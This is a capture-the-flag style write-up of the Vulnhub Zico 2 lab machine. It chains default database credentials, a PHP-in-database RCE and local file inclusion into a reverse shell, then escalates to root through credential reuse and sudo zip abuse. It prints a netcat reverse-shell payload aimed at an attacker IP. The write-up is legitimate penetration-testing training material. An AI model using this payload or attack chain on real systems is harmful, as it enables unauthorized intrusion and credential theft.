The Zico 2 Write Up

Another excellent write up from security researcher Thunder Son who covers Vulnhub's Zico 2 machine and jumps right into a technical deep dive.

The Zico 2 Write Up

Preparing for the OSCP exam, I found a gem prepared by Clutch to assist people that want to get a feel of what the exam is all about through machines from vulnhub that'd replicate the environment.  One of those machines is Zico 2. This machine looks to be a personal shop for Zico, whether it was built by them or by a third party. One thing can be taken out of the name is that there is a possibility of an inexperienced user working behind the scenes.

The Pre-Exam can be found here.

Fig 0. Zico's Shop

Information Gathering

Starting off, netdiscover allows us to find out the IP on the internal network of the virtual network. netdiscover -i eth0 -r 192.168.56.0/24 where -i stands for the interface and -r stands for the network range that we want to scan.

Fig 1. Netdiscover Results

Knowing where the machines stands, the process continues with port scanning. Using NMAP, the below results are generated.

Fig 2. NMAP Results

From the results above, it can be noted that the SSH service running is a bit old. Prioritizing the services, the HTTP service will be tackled first while keeping note of the old SSH version used.

After running gobuster on the web service, a very interesting location gets discovered, /dbadmin.

Discovery Analysis

Fig 3. Lite Admin Application

Trying the most basic login attempt with admin gives us access to the DB application.

Fig 4. DB data

Those are clearly md5 hashes. Using an online cracking service, the below results are given.

Fig 5. Passwords Discovery

Trying to SSH using those 2 users, nothing fruitful comes out of the attempts. Then again, that table is called test_users which makes total sense.

Before leaving the database and looking at the other web files and directories, a quick lookup in exploit-db provides us with the following exploit. This exploit works by saving a database with a .php extension to it, and writing PHP code in a text field, we can get RCE.

A thing stopping us from abusing that exploit is the execution part. Under web terminology, that execution can be leveraged using LFI, since we know as well where the database is located, in /usr/database/<database_name>.

After going through the web application, we hit a URL containing an interesting parameter!

Fig 6. Tools Page

This is the perfect case for LFI. Let's test it out!

Fig 7. LFI

That's exactly what we needed! Out of curiosity as well, simple testing for RFI was conducted, where all attempts failed to execute.

Gaining Access

Trying one of the most basic and quickest reverse shell commands, <?php system('nc -e /bin/sh 192.168.56.102 4001 2>&1');?> fails showing us that this is a BSD system and it doesn't support the -e parameter.

Knowing that python exists on that system, the below reverse shell using python was used to connect to our port 443. This is the requests that updates the table in the database hak.php that we created.

Fig 8. Python Reverse Shell

Proceeding to grab our shell, the LFI exploit is abused to execute that code:

Fig 9. Reverse Shell Execution
Fig 10. Reverse Shell Successful

Since we are www-data, it is crucial to know what other users exist on that system. From the /etc/passwd file, it is clear that the user zico exists. Looking into /home/zico, a wordpress directory is discovered. As usual, a wp-config.php file exist in there that'd contain some juicy information!

Fig 11. WordPress Configuration File

The same user is used for DB access! Since people always re-use their passwords, I try to SSH using the credentials given.

Fig 12. SSH Zico

Success! We got in as Zico, and lookie there! We got some sudo privileges.

Privilege Escalation

Checking a privilege escalation cheat-sheet, the zip binary is abused to gain a root shell.

Fig 13. Privilege Escalation

And rooooot! Straight forward sudo abuse right there.

Conclusion

This box is an intermediate box since it requires the chaining of 2 exploits, which can be tricky for beginners and starters. A big thank you to the creator Rafael as it was a fun adventure.

If you enjoyed my writing you can find me on Twitter as @7hunderson.

The awesome GIF used in this article is called "Pill Trip" and it was created by Messer Piter.